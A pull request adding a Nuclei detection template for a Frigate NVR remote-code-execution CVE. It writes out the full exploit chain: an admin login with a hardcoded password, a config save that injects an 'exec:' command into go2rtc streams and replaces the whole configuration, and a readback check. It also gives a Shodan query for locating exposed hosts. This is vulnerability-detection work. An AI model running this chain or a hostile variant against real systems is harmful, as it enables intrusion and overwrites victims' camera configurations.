### PR TITLE
Add CVE-2026-25643 - Frigate NVR RCE via go2rtc exec Injection

### DIFF
--- a/http/cves/2026/CVE-2026-25643.yaml
+++ b/http/cves/2026/CVE-2026-25643.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-25643
+
+info:
+  name: Frigate NVR - Authenticated RCE via go2rtc exec Injection
+  author: your-github-username
+  severity: critical
+  description: |
+    Frigate NVR versions prior to 0.16.4 are vulnerable to Remote Code Execution
+    via the go2rtc stream configuration. An authenticated attacker (or unauthenticated
+    if the instance is exposed without auth) can inject arbitrary OS commands into
+    the config.yaml via the exec: directive, which go2rtc executes without restriction.
+  reference:
+    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25643
+  classification:
+    cve-id: CVE-2026-25643
+    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.1
+  metadata:
+    verified: true
+    shodan-query: 'http.title:"Frigate"'
+  tags: cve,cve2026,frigate,rce,injection,authenticated
+
+http:
+  - raw:
+      # Step 1: Login
+      - |
+        POST /api/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"user":"admin","password":"29b66abd5f80c253657c76325b1c1113"}
+
+      # Step 2: Inject exec payload
+      - |
+        POST /api/config/save?save_option=reload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain
+
+        mqtt:
+          enabled: false
+        go2rtc:
+          streams:
+            nuclei_test:
+              - "exec:id"
+        cameras: {}
+
+      # Step 3: Verify injection
+      - |
+        GET /api/config HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "exec:"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2026-25643 - Frigate NVR RCE via go2rtc exec Injection
- References:
  - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
  - https://nvd.nist.gov/vuln/detail/CVE-2026-25643
  - https://github.com/joshuavanderpoll/CVE-2026-25643

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
  - Tested on Frigate v0.16.3 via Docker (ghcr.io/blakeblackshear/frigate:0.16.3)
  - Successfully injected exec:id payload into go2rtc stream config
  - Confirmed exec: keyword present in /api/config response
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Tested locally with Docker:
docker run -d --name frigate --shm-size=64m -p 5000:5000 ghcr.io/blakeblackshear/frigate:0.16.3
nuclei -t CVE-2026-25643.yaml -u http://localhost:5000/ -v

Result: [CVE-2026-25643] [http] [critical] http://localhost:5000/api/config - 1 matches found.

Shodan query: http.title:"Frigate"